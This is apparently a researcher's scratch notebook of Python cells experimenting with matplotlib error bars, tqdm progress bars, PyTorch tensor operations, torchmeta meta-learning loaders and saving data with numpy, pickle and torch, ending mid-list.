plt.errorbar(x, y, xerr=xerr, yerr=yerr, ls=ls, color='blue')
# including upper limits
uplims = np.zeros(x.shape)
uplims[[1, 5, 9]] = True
plt.errorbar(x, y + 0.5, xerr=xerr, yerr=yerr, uplims=uplims, ls=ls,
color='green')
# including lower limits
lolims = np.zeros(x.shape)
lolims[[2, 4, 8]] = True
plt.errorbar(x, y + 1.0, xerr=xerr, yerr=yerr, lolims=lolims, ls=ls,
color='red')
# including upper and lower limits
plt.errorbar(x, y + 1.5, marker='o', ms=8, xerr=xerr, yerr=yerr,
lolims=lolims, uplims=uplims, ls=ls, color='magenta')
# including xlower and xupper limits
xerr = 0.2
yerr = np.zeros(x.shape) + 0.2
yerr[[3, 6]] = 0.3
xlolims = lolims
xuplims = uplims
lolims = np.zeros(x.shape)
uplims = np.zeros(x.shape)
lolims[[6]] = True
uplims[[3]] = True
plt.errorbar(x, y + 2.1, marker='o', ms=8, xerr=xerr, yerr=yerr,
xlolims=xlolims, xuplims=xuplims, uplims=uplims, lolims=lolims,
ls='none', mec='blue', capsize=0, color='cyan')
ax.set_xlim((0, 5.5))
ax.set_title('Errorbar upper and lower limits')
plt.show()
# %%
from types import SimpleNamespace
from pathlib import Path
from pprint import pprint
args = SimpleNamespace()
args.data_root = "~/automl-meta-learning/data/miniImagenet"
args.data_root = Path(args.data_root).expanduser()
print(args)
# pprint(dir(args.data_root))
print(args.data_root.name)
print('miniImagenet' in args.data_root.name)
# %%
## sampling N classes for len(meta-set)
# In sampling without replacement, each unit of the population can be selected at most once,
# because you do not put back what you removed.
import random
N = 5
len_meta_set = 64
sample = random.sample(range(0, len_meta_set), N)
print(sample)
for i, n in enumerate(sample):
print(f'i={i}\nn={n}\n')
# %%
# iterator https://www.programiz.com/python-programming/iterator
class Counter:
def __init__(self, max=0):
self.max = max # returns up to and including that number
def __iter__(self):
self.n = 0
return self
def __next__(self):
if self.n <= self.max:
current_count = self.n
self.n += 1
print(f'current_count = {current_count}')
print(f'self.n = {self.n}')
print(self.n is current_count)
return current_count
else:
raise StopIteration
## test it
counter = iter(Counter(max=0))
for count in counter:
print(f'count = {count}')
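# %%
# (my addition) sketch: the same counting behaviour written as a generator function,
# which implements __iter__/__next__ for you and raises StopIteration automatically
def counter_gen(max=0):
    n = 0
    while n <= max:  # yields 0, 1, ..., max inclusive, like the Counter class above
        yield n
        n += 1

for count in counter_gen(max=3):
    print(f'count = {count}')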
# %%
from tqdm import tqdm
print(tqdm)
lst = range(3)
print(type(lst))
with tqdm(iter(lst), total=5) as tlist:
print(f'tlist = {type(tlist)}')
for i in tlist:
print(i)
# %%
from tqdm import tqdm
class Plus2:
def __init__(self, max=0):
self.max = max # returns up to and including that number
def __iter__(self):
self.it = 0
self.tot = 0
return self
def __next__(self):
if self.it <= self.max:
self.it += 1
self.tot += 2
return self.tot
else:
raise StopIteration
def __len__(self):
return self.max
##
counter = iter(Plus2(max=int(100000)))
with tqdm(counter, total=len(counter)) as tqcounter:
for idx, pow2 in enumerate(tqcounter):
print()
print(f'idx = {idx}')
        print(f'pow2 = {pow2}')
pass
# %%
from tqdm import tqdm
for i in tqdm(range(int(9e6))):
pass
# %%
from tqdm import tqdm
import time
with tqdm(range(int(5))) as trange:
for i in trange:
print(f'\ni = {i}')
print('done\n')
time.sleep(1)
pass
# %%
# zip pairs up elements of one list with the corresponding elements of the other
l1 = [0, 1, 2]
l2 = ['a', 'b', 'c']
print(list(zip(l1, l2)))
# %%
from tqdm import tqdm
import time
lst = range(10000000)
total = 2
with tqdm(lst, total=total) as tlst:
i = 0
for _, element in enumerate(tlst):
print(f'\n->i = {i}\n')
time.sleep(0.2)
i += 1
if i >= total:
break
print('\n--> DONE \a')
# %%
from tqdm import tqdm
import time
lst = range(10000000)
total = 2
with tqdm(lst, total=total) as tlst:
for idx, element in enumerate(tlst):
print(f'\n->idx = {idx}\n')
time.sleep(0.2)
if idx >= total:
break
print('\n--> DONE \a')
# %%
from tqdm import tqdm
import time
lst = range(10000000)
total = 2
with tqdm(range(total)) as tcounter:
lst = iter(lst)
for idx, element in enumerate(tcounter):
print(f'\n->idx = {idx}\n')
time.sleep(0.2)
print('\n--> DONE \a')
# %%
# Question: Do detached() tensors track their own gradients separately?
# Ans: Yes!
# https://discuss.pytorch.org/t/why-is-the-clone-operation-part-of-the-computation-graph-is-it-even-differentiable/67054/11
import torch
a = torch.tensor([2.0], requires_grad=True)
b = a.detach()
b.requires_grad = True
la = (5.0 - a) ** 2
la.backward()
print(f'a.grad = {a.grad}')
lb = (6.0 - b) ** 2
lb.backward()
print(f'b.grad = {b.grad}')
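# (my addition) contrast with clone(): clone stays in the computation graph, so gradients
# from a clone-based loss flow back into (and accumulate on) a.grad
c = a.clone()
lc = (7.0 - c) ** 2
lc.backward()
print(f'a.grad after clone-based loss = {a.grad}')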
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
params = OrderedDict([
('fc0', nn.Linear(in_features=4, out_features=4)),
('ReLU0', nn.ReLU()),
('fc1', nn.Linear(in_features=4, out_features=1))
])
mdl = nn.Sequential(params)
print(params)
print(mdl._parameters)
print(params == params)
print(mdl._parameters == params)
print(mdl._modules)
print()
for name, w in mdl.named_parameters():
print(name, w.norm(2))
print()
# mdl._modules['fc0'] = nn.Linear(10,11)
# modules in a Sequential built from an OrderedDict are keyed by name, not by integer index
print(mdl._modules['fc0'])
for name, w in mdl.named_parameters():
print(name, w.norm(2))
# %%
## Q: are parameters are in computation graph?
# import torch
# import torch.nn as nn
# # from torchviz import make_dot
#
# from collections import OrderedDict
#
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# print(fc0.weight)
# print(fc0.bias)
# print(fc0.weight.to_tens)
# print()
# # make_dot(l,{x:'x',y:'y','fc0':fc0})
# make_dot(l, {'x': x, 'y': y})
# make_dot(l)
# %%
'''
expand
'''
import torch
x = torch.randn([2, 3, 4, 5])
# h_0 of shape (num_layers * num_directions, batch, hidden_size)
h = torch.randn([1, 4, 8])
x_mean = x.mean()
print(x_mean.size())
print(x_mean)
x = x_mean.expand_as(h)
print(x.size())
print(x)
# %%
import torch
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
print(device)
type(device)
print(device == 'cpu')
device.type
# %%
# THIS WORKS
from torch.utils.tensorboard import SummaryWriter
from pathlib import Path
# log_dir (string) – Save directory location.
# Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
tb = SummaryWriter()
tb.add_scalar('loss', 111)
# %%
from torch.utils.tensorboard import SummaryWriter
from pathlib import Path
def CURRENT_DATETIME_HOSTNAME(comment=''):
# if not log_dir:
import socket
import os
from datetime import datetime
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
return Path(log_dir)
# log_dir (string) – Save directory location.
# Default is runs/CURRENT_DATETIME_HOSTNAME, which changes after each run.
# tensorboard --logdir=runs
log_dir = (Path('~/automl-meta-learning/') / CURRENT_DATETIME_HOSTNAME()).expanduser()
print(log_dir)
tb = SummaryWriter(log_dir=log_dir)
tb.add_scalar('loss', 15)
# %%
# download mini-imagenet automatically
# note: download_and_extract_archive lives in torchvision.datasets.utils, not torchvision.utils
from torchvision.datasets.utils import download_and_extract_archive
import torchvision.utils as utils
print(utils)
print(download_and_extract_archive)
# %%
# torch concat, https://pytorch.org/docs/stable/torch.html#torch.cat
# Concatenates the given sequence of seq tensors in the given dimension.
# All tensors must either have the same shape (except in the concatenating dimension) or be empty.
import torch
g1 = torch.randn(3, 2)
g2 = torch.randn(4, 2)
g3 = torch.randn(4, 2, 3)
grads = [g1, g2]
print(g1.view(-1).size())
print(g2.view(-1).size())
print(g3.view(-1).size())
# print(g3.view(-1))
grads = torch.cat(grads, dim=0)
print(grads)
print(grads.size())
print(grads.mean())
print(grads.std())
# torch stack, https://pytorch.org/docs/stable/torch.html#torch.stack
# Concatenates sequence of tensors along a new dimension.
# All tensors need to be of the same size.
# torch.stack([g1,g2], dim=0)
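# (my addition) minimal stack sketch: unlike cat, stack requires equal shapes and adds a new dim
s1, s2 = torch.randn(4, 2), torch.randn(4, 2)
stacked = torch.stack([s1, s2], dim=0)
print(stacked.size())  # torch.Size([2, 4, 2])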
# %%
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
a_detached = a.detach()
print(a_detached.is_leaf)
c = a.sum()  # non-leaf: the result of an op on a tensor that requires grad
print(c.is_leaf)
d = c.detach()
print(d.is_leaf)
# %%
import torch
from types import SimpleNamespace
from pathlib import Path
from pprint import pprint
x = torch.empty([1, 2, 3])
print(x.size())
args = SimpleNamespace()
args.data_root = "~/automl-meta-learning/data/miniImagenet"
# n1313361300001299.jpg
args.data_root = Path(args.data_root).expanduser()
# %%
import torch
CHW = 3, 12, 12
x = torch.randn(CHW)
y = torch.randn(CHW)
new = [x, y]
new = torch.stack(new)
print(x.size())
print(new.size())
# %%
print('a')
print('b')
# %%
# convert list to tensor
import torch
x = torch.tensor([1, 2, 3.])
print(x)
# %%
from torchvision.transforms import Compose, Resize, ToTensor
import torchmeta
from torchmeta.datasets.helpers import miniimagenet
from pathlib import Path
from types import SimpleNamespace
from tqdm import tqdm
## get args
args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
## get meta-batch loader
train_transform = Compose([Resize(84), ToTensor()])
dataset = miniimagenet(
args.data_root,
ways=args.n_classes,
shots=args.k_shot,
test_shots=args.k_eval,
meta_split='train',
download=False)
dataloader = torchmeta.utils.data.BatchMetaDataLoader(
dataset,
batch_size=args.meta_batch_size,
num_workers=args.n_workers)
with tqdm(dataset):
print(f'len(dataloader)= {len(dataloader)}')
for episode, batch in enumerate(dataloader):
print(f'episode = {episode}')
train_inputs, train_labels = batch["train"]
print(f'train_labels[0] = {train_labels[0]}')
print(f'train_inputs.size() = {train_inputs.size()}')
pass
if episode >= args.episodes:
break
# %%
# zip tensors
import torch
x = torch.tensor([1., 2., 3.])
y = torch.tensor([1, 2, 3])
print(list(zip(x, y)))
xx = torch.randn(2, 3, 84, 84)
yy = torch.randn(2, 3, 32, 32)
print(len(list(zip(xx, yy))))
# %%
x = 2
print(x)
# %%
## sinusoid function
print('Starting Sinusoid cell')
from torchmeta.toy import Sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
# from tqdm import tqdm
batch_size = 16
shots = 5
test_shots = 15
# dataset = torchmeta.toy.helpers.sinusoid(shots=shots, test_shots=test_shots)
metaset_dataset = Sinusoid(num_samples_per_task=shots + test_shots, num_tasks=100, noise_std=None)
splitter_metset_dataset = ClassSplitter(
metaset_dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
dataloader = BatchMetaDataLoader(splitter_metset_dataset, batch_size=batch_size, num_workers=4)
print(f'batch_size = {batch_size}')
print(f'len(dataset) = {len(metaset_dataset)}')
print(f'len(dataloader) = {len(dataloader)}\n')
for batch_idx, batch in enumerate(dataloader):
print(f'batch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
if batch_idx >= 1: # halt after 2 iterations
break
print('DONE\a')
# %%
## notes of torchmeta
from pathlib import Path
import torchmeta
# meta-set: creates collection of data-sets, D_meta = {D_1, ... Dn}
print('\n-- Sinusoid(MetaDataset)')
metaset_sinusoid = torchmeta.toy.Sinusoid(num_samples_per_task=10, num_tasks=1_000_000, noise_std=None)
print(f'type(metaset_sinusoid) = {type(metaset_sinusoid)}')
print(f'len(metaset_sinusoid) = {len(metaset_sinusoid)}')
print(f'metaset_sinusoid = {metaset_sinusoid}')
# this is still a data set but helps implement forming D_i
# i.e. the N-way, K-shot tasks/datasets we need.
print('\n-- MiniImagenet(CombinationMetaDataset)')
data_path = Path('~/data').expanduser()
metaset_miniimagenet = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_train=True,
download=True)
print(f'type(metaset_miniimagenet) = {type(metaset_miniimagenet)}')
print(f'len(metaset_miniimagenet) = {len(metaset_miniimagenet)}')
print(f'metaset_miniimagenet = {metaset_miniimagenet}')
# Splits the data-sets inside the meta-set into support/train & query/test sets
dataset = metaset_miniimagenet
dataset = torchmeta.transforms.ClassSplitter(dataset, num_train_per_class=1, num_test_per_class=15, shuffle=True)
print(dataset)
# %%
import torch
import torch.nn as nn
import numpy as np
x_np = np.random.uniform(size=(1, 1))  # numpy version, kept for comparison
print(x_np)
x = torch.rand(1, 1)  # Linear(1, 1) expects a trailing feature dimension of size 1
print(x)
l = nn.Linear(1, 1)
y = l(x)
print(y)
# %%
# saving tensors for my data set
import torch
import torch.nn as nn
from collections import OrderedDict
from pathlib import Path
# N x's of size D=1 in an interval
Din, Dout = 3, 2
num_samples = 5
lb, ub = -1, 1
X = (ub - lb) * torch.rand([num_samples, Din]) + lb # rand gives uniform in [0,1) range
# N y's of size Dout (from the output of the NN)
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
# fill the linear layer's weights & biases with Gaussian values
mu1, std1 = 5, 7.5
f.f1.weight.data.normal_(mu1, std1)
f.f1.bias.data.normal_(mu1, std1)
# get outputs
Y = f(X)
print(Y)
# save tensors and cnn
# https://stackoverflow.com/questions/1466000/difference-between-modes-a-a-w-w-and-r-in-built-in-open-function
db = {
'X': X,
'Y': Y
}
path = Path(f'~/data/tmp/SinData_mu1{mu1}_std1{std1}/').expanduser()
path.mkdir(parents=True, exist_ok=True)
with open(path / 'db', 'wb') as file:  # torch.save writes bytes, so open in binary write mode
    torch.save(db, file)
# %%
# saving data in numpy
import numpy as np
import pickle
from pathlib import Path
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
lb, ub = -1, 1
num_samples = 5
x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
y = x ** 2 + x + 2
# using save (to npy), savez (to npz)
np.save(path / 'x', x)
np.save(path / 'y', y)
np.savez(path / 'db', x=x, y=y)
with open(path / 'db.pkl', 'wb') as db_file:
pickle.dump(obj={'x': x, 'y': y}, file=db_file)
## using loading npy, npz files
x_loaded = np.load(path / 'x.npy')
y_load = np.load(path / 'y.npy')
db = np.load(path / 'db.npz')
with open(path / 'db.pkl', 'rb') as db_file:
db_pkl = pickle.load(db_file)
print(x is x_loaded)
print(x == x_loaded)
print(x == db['x'])
print(x == db_pkl['x'])
print('done')
# %%
import numpy as np
from pathlib import Path
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
lb, ub = -1, 1
num_samples = 5
x = np.random.uniform(low=lb, high=ub, size=(1, num_samples))
y = x ** 2 + x + 2
np.save(path / 'x', x)
np.save(path / 'y', y)
x_loaded = np.load(path / 'x.npy')
y_load = np.load(path / 'y.npy')
print(x is x_loaded) # False
print(x == x_loaded) # [[ True True True True True]]
# %%
# saving torch tensors
import torch
import torch.nn as nn
import torchvision
from pathlib import Path
from collections import OrderedDict
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
tensor_a = torch.rand(2, 3)
tensor_b = torch.rand(1, 3)
db = {'a': tensor_a, 'b': tensor_b}
torch.save(db, path / 'torch_db')
loaded = torch.load(path / 'torch_db')
print(loaded['a'] == tensor_a)
print(loaded['b'] == tensor_b)
# testing if ToTensor() screws things up
lb, ub = -1, 1
N, Din, Dout = 3, 1, 1
x = torch.distributions.Uniform(low=lb, high=ub).sample((N, Din))
print(x)
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
y = f(x)
transform = torchvision.transforms.transforms.ToTensor()
y_proc = transform(y)
print(y_proc)
# %%
# merge dict
# union dictionaries, https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression-in-python
d1 = {'a': 1, 'b': 2.5}
d2 = {'b': 2, 'c': 3, 'd': 4}
d = {**d1, **d2}
# duplicates resolved in favour of d2
print(d)
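# (my addition) sketch: collections.ChainMap gives a merged *view* without copying;
# lookups resolve in favour of the first mapping, so listing d2 first matches {**d1, **d2}
from collections import ChainMap
print(dict(ChainMap(d2, d1)))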
# %%
# generating uniform variables
import numpy as np
num_samples = 3
Din = 1
lb, ub = -1, 1
xn = np.random.uniform(low=lb, high=ub, size=(num_samples, Din))
print(xn)
import torch
sampler = torch.distributions.Uniform(low=lb, high=ub)
r = sampler.sample((num_samples, Din))
print(r)
r2 = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
print(r2)
# process input through a small NN
import torch.nn as nn
from collections import OrderedDict
Dout = 1  # output dim for this toy example (not defined earlier in this cell)
f = nn.Sequential(OrderedDict([
    ('f1', nn.Linear(Din, Dout)),
    ('out', nn.SELU())
]))
Y = f(r2)
print(Y)
# %%
# sampling from normal distribution in torch
import torch
num_samples = 3
Din = 1
mu, std = 0, 1
x = torch.distributions.normal.Normal(loc=mu, scale=std).sample((num_samples, Din))
print(x)
# %%
# creating data and running through a nn and saving it
import torch
import torch.nn as nn
from pathlib import Path
from collections import OrderedDict
import numpy as np
import pickle
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
num_samples = 3
Din, Dout = 1, 1
lb, ub = -1, 1
x = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
y = f(x)
# save data torch to numpy
x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
np.savez(path / 'db', x=x_np, y=y_np)
print(x_np)
# save model
with open('db_saving_seq', 'wb') as file:
pickle.dump({'f': f}, file)
# load model
with open('db_saving_seq', 'rb') as file:
db = pickle.load(file)
f2 = db['f']
# test that it outputs the right thing
y2 = f2(x)
y_eq_y2 = y == y2
print(y_eq_y2)
db2 = {'f': f, 'x': x, 'y': y}
torch.save(db2, path / 'db_f_x_y')
print('Done')
db3 = torch.load(path / 'db_f_x_y')
f3 = db3['f']
x3 = db3['x']
y3 = db3['y']
yy3 = f3(x3)
y_eq_y3 = y == y3
print(y_eq_y3)
y_eq_yy3 = y == yy3
print(y_eq_yy3)
# %%
# test for saving everything with torch.save
import torch
import torch.nn as nn
from pathlib import Path
from collections import OrderedDict
import numpy as np
import pickle
path = Path('~/data/tmp/').expanduser()
path.mkdir(parents=True, exist_ok=True)
num_samples = 3
Din, Dout = 1, 1
lb, ub = -1, 1
x = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
f = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
y = f(x)
# save data torch to numpy
x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
db2 = {'f': f, 'x': x_np, 'y': y_np}
torch.save(db2, path / 'db_f_x_y')
# np.savetxt(path / 'output.csv', y_np) # for csv
db3 = torch.load(path / 'db_f_x_y')
f3 = db3['f']
x3 = db3['x']
y3 = db3['y']
xx = torch.tensor(x3)
yy3 = f3(xx)
print(yy3)
# %%
# my saving code for synthetic data, nvm using torch.save for everything
# import torch
# import torch.nn as nn
#
# from pathlib import Path
# from collections import OrderedDict
#
# import numpy as np
#
# path = Path('~/data/tmp/').expanduser()
# path.mkdir(parents=True, exist_ok=True)
#
# num_samples = 3
# Din, Dout = 1, 1
# lb, ub = -1, 1
#
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
#
# f = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din,Dout)),
# ('out', nn.SELU())
# ]))
# y = f(x)
#
# # save data torch to numpy
# x_np, y_np = x.detach().cpu().numpy(), y.detach().cpu().numpy()
# np.savez(path / 'data', x=x_np, y=y_np)
#
# # save model
# torch.save(f,path / 'f')
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
num_samples = 3
Din, Dout = 1, 1
lb, ub = -1, 1
x = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples, Din))
hidden_dim = [(Din, 20), (20, 20), (20, 20), (20, 20), (20, Dout)]
f = nn.Sequential(OrderedDict([
('fc1;l1', nn.Linear(hidden_dim[0][0], hidden_dim[0][1])),
('relu2', nn.ReLU()),
('fc2;l1', nn.Linear(hidden_dim[1][0], hidden_dim[1][1])),
('relu2', nn.ReLU()),
('fc3;l1', nn.Linear(hidden_dim[2][0], hidden_dim[2][1])),
('relu3', nn.ReLU()),
('fc4;l1', nn.Linear(hidden_dim[3][0], hidden_dim[3][1])),
('relu4', nn.ReLU()),
('fc5;final;l2', nn.Linear(hidden_dim[4][0], hidden_dim[4][1]))
]))
y = f(x)
print(y)
section_label = [1] * 4 + [2]
print(section_label)
# %%
# get list of paths to task
# https://stackoverflow.com/questions/973473/getting-a-list-of-all-subdirectories-in-the-current-directory
# https://stackoverflow.com/a/44228436/1601580
from pathlib import Path
from glob import glob
meta_split = 'train'
data_path = Path('~/data/LS/debug/fully_connected_NN_mu1_1.0_std1_2.5_mu2_1.0_std2_0.5/')
data_path = (data_path / meta_split).expanduser()
# with path lib
tasks_folder = [f for f in data_path.iterdir() if f.is_dir()]
assert ('f_avg' not in tasks_folder)
len_folder = len(tasks_folder)
print(len_folder)
print(tasks_folder)
print()
# with glob
p = str(data_path) + '/*/'
print(p)
tasks_folder = glob(p)
assert ('f_avg' not in tasks_folder)
len_folder = len(tasks_folder)
print(len_folder)
print(tasks_folder)
print()
# with glob and negation
print(set(glob(str(data_path / "f_avg"))))
tasks_folder = set(glob(str(data_path / '*'))) - set(glob(str(data_path / "f_avg")))
assert ('f_avg' not in tasks_folder)
len_folder = len(tasks_folder)
print(len_folder)
print(tasks_folder)
print()
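# (my addition) sketch: the same filtering with os.scandir, which avoids building Path objects
# and can be faster on directories with many entries
import os
tasks_folder = [entry.path for entry in os.scandir(data_path) if entry.is_dir() and entry.name != 'f_avg']
print(len(tasks_folder))
print(tasks_folder)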
# %%
# looping through metasets
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
from torchmeta.toy import Sinusoid
from tqdm import tqdm
# get data set
dataset = Sinusoid(num_samples_per_task=25, num_tasks=30)
shots, test_shots = 5, 15
# get metaset
metaset = ClassSplitter(
dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
# get meta-dataloader
batch_size = 16
num_workers = 0
meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
epochs = 2
print(f'batch_size = {batch_size}')
print(f'len(metaset) = {len(metaset)}')
print(f'len(meta_dataloader) = {len(meta_dataloader)}')
with tqdm(range(epochs)) as tepochs:
for epoch in tepochs:
for batch_idx, batch in enumerate(meta_dataloader):
print(f'\nbatch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
# %%
from tqdm import tqdm
import time
with tqdm(range(5)) as trange:
for t in trange:
print(t)
time.sleep(1)
# %%
import torch
import torch.nn as nn
l1 = torch.tensor([1, 2, 3.]) ** 0.5
l2 = torch.tensor([0, 0, 0.0])
mse = nn.MSELoss()
loss = mse(l1, l2)
print(loss)
# %%
import numpy as np
x = np.arange(0, 10)
print(x)
print(x.max())
print(x.min())
print(x.mean())
print(np.median(x))
# %%
x = torch.randn(3)
print(x)
print(x.argmax(-1))
# %%
# testing accuracy function
# https://discuss.pytorch.org/t/calculating-accuracy-of-the-current-minibatch/4308/11
# https://stackoverflow.com/questions/51503851/calculate-the-accuracy-every-epoch-in-pytorch
import torch
import torch.nn as nn
D = 1
true = torch.tensor([0, 1, 0, 1, 1]).reshape(5, 1)
print(f'true.size() = {true.size()}')
batch_size = true.size(0)
print(f'batch_size = {batch_size}')
x = torch.randn(batch_size, D)
print(f'x = {x}')
print(f'x.size() = {x.size()}')
mdl = nn.Linear(D, 1)
logit = mdl(x)
_, pred = torch.max(logit.data, 1)
print(f'logit = {logit}')
print(f'pred = {pred}')
print(f'true = {true}')
acc = (true == pred).sum().item()
print(f'acc = {acc}')
# %%
# https://towardsdatascience.com/understanding-dimensions-in-pytorch-6edf9972d3be
# dimension
# https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/4?u=brando_miranda
"""
Dimension reduction. It collapses/reduces a specific dimension by selecting an element from that dimension to be
reduced.
Consider x is 3D tensor. x.sum(1) converts x into a tensor that is 2D using an element from D1 elements in
the 1th dimension. Thus:
x.sum(1) = x[i,k] = op(x[i,:,k]) = op(x[i,0,k],...,x[i,D1,k])
the key is to realize that we need 3 indices to select a single element. So if we use only 2 (because we are collapsing)
then we have D1 number of elements possible left that those two indices might indicate. So from only 2 indices we get a
set that we need to specify how to select. This is where the op we are using is used for and selects from this set.
In theory if we want to collapse many indices we need to indicate how we are going to allow indexing from a smaller set
of indices (using the remaining set that we'd usually need).
"""
import torch
x = torch.tensor([
[1, 2, 3],
[4, 5, 6]
])
print(f'x.size() = {x.size()}')
# sum over the 0th dimension (rows), leaving columns whose rows have been added together
x0 = x.sum(0)
print(x0)
# sum the 1th dimension (columns)
x1 = x.sum(1)
print(x1)
x_1 = x.sum(-1)
print(x_1)
x0 = x.max(0)
print(x0.values)
y = torch.tensor([[
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[17, 18, 19, 20],
[21, 22, 23, 24]]])
print(y)
# into the screen [1, 13]
print(y[:, 0, 0])
# columns [1, 5, 9]
print(y[0, :, 0])
# rows [1, 2, 3, 4]
print(y[0, 0, :])
# for each remaining index, select the largest value in the "screen" dimension
y0 = y.max(0)
print(y0.values)
# %%
# understanding making label predictions
# https://discuss.pytorch.org/t/how-does-one-get-the-predicted-classification-label-from-a-pytorch-model/91649/3?u=brando_miranda
def calc_accuracy(mdl, X, Y):
# reduce/collapse the classification dimension according to max op
# resulting in most likely label
max_vals, max_indices = mdl(X).max(1)
# assumes the first dimension is batch size
n = max_indices.size(0) # index 0 for extracting the # of elements
    # calculate acc (note .item() to do float division)
acc = (max_indices == Y).sum().item() / n
return acc
import torch
import torch.nn as nn
# data dimension [batch-size, D]
D, Dout = 1, 5
batch_size = 16
x = torch.randn(batch_size, D)
y = torch.randint(low=0, high=Dout, size=(batch_size,))
mdl = nn.Linear(D, Dout)
logits = mdl(x)
print(f'y.size() = {y.size()}')
# max over the 1st (class) dimension collapses the classification layer's outputs,
# i.e. it returns the most likely label. Note we take .indices since we want the position
# of the most likely label, not its raw logit value.
pred = logits.max(1).indices
print(pred)
print('--- preds vs truth ---')
print(f'predictions = {pred}')
print(f'y = {y}')
acc = (pred == y).sum().item() / pred.size(0)
print(acc)
print(calc_accuracy(mdl, x, y))
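# (my addition) note: argmax over raw logits gives the same labels as argmax over softmax,
# since softmax is monotonic within each row; so no softmax is needed just to predict labels
probs = torch.softmax(logits, dim=1)
print(torch.equal(probs.argmax(dim=1), logits.argmax(dim=1)))  # expected: True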
# %%
# https://discuss.pytorch.org/t/runtimeerror-element-0-of-variables-does-not-require-grad-and-does-not-have-a-grad-fn/11074/20
import torch
import torch.nn as nn
x = torch.randn(1)
mdl = nn.Linear(1, 1)
y = mdl(x)
print(mdl.weight)
print(y)
# %%
# https://discuss.pytorch.org/t/how-to-get-the-module-names-of-nn-sequential/39682
# looping through modules but get the one with a specific name
import torch
import torch.nn as nn
from collections import OrderedDict
params = OrderedDict([
('fc0', nn.Linear(in_features=4, out_features=4)),
('ReLU0', nn.ReLU()),
('fc1L:final', nn.Linear(in_features=4, out_features=1))
])
mdl = nn.Sequential(params)
# throws error
# mdl['fc0']
for m in mdl.children():
print(m)
print()
for m in mdl.modules():
print(m)
print()
for name, m in mdl.named_modules():
print(name)
print(m)
print()
for name, m in mdl.named_children():
print(name)
print(m)
# %%
# apply mdl to x until the final layer, then return the embeding
# import torch
# import torch.nn as nn
#
# from collections import OrderedDict
#
# Din, Dout = 1, 1
# H = 10
#
# modules = OrderedDict([
# ('fc0', nn.Linear(in_features=Din, out_features=H)),
# ('ReLU0', nn.ReLU()),
#
# ('fc1', nn.Linear(in_features=H, out_features=H)),
# ('ReLU1', nn.ReLU()),
#
# ('fc2', nn.Linear(in_features=H, out_features=H)),
# ('ReLU2', nn.ReLU()),
#
# ('fc3', nn.Linear(in_features=H, out_features=H)),
# ('ReLU3', nn.ReLU()),
#
# ('fc4L:final', nn.Linear(in_features=H, out_features=Dout))
# ])
#
# mdl = nn.Sequential(modules)
#
# out = x
# for name, m in self.base_model.named_children():
# if 'final' in name:
# # return out
# break
# out = m(out)
#
# print(out.size())
# %%
# initializing a constant weight net
# https://discuss.pytorch.org/t/how-to-add-appropriate-noise-to-a-neural-network-with-constant-weights-so-that-back-propagation-training-works/93411
# import torch
# [layer.reset_parameters() for layer in base_model.children() if hasattr(layer, 'reset_parameters')]
# model = nn.Linear(1, 1)
# model_copy = copy.deepcopy(model)
# %%
print('start')
# f_avg: PLinReg vs MAML
import numpy as np
from matplotlib import pyplot as plt
from pathlib import Path
datas_std = [0.1, 0.125, 0.1875, 0.2]
pl = [2.3078539778125768e-07,
1.9997889411762922e-07,
2.729681222011256e-07,
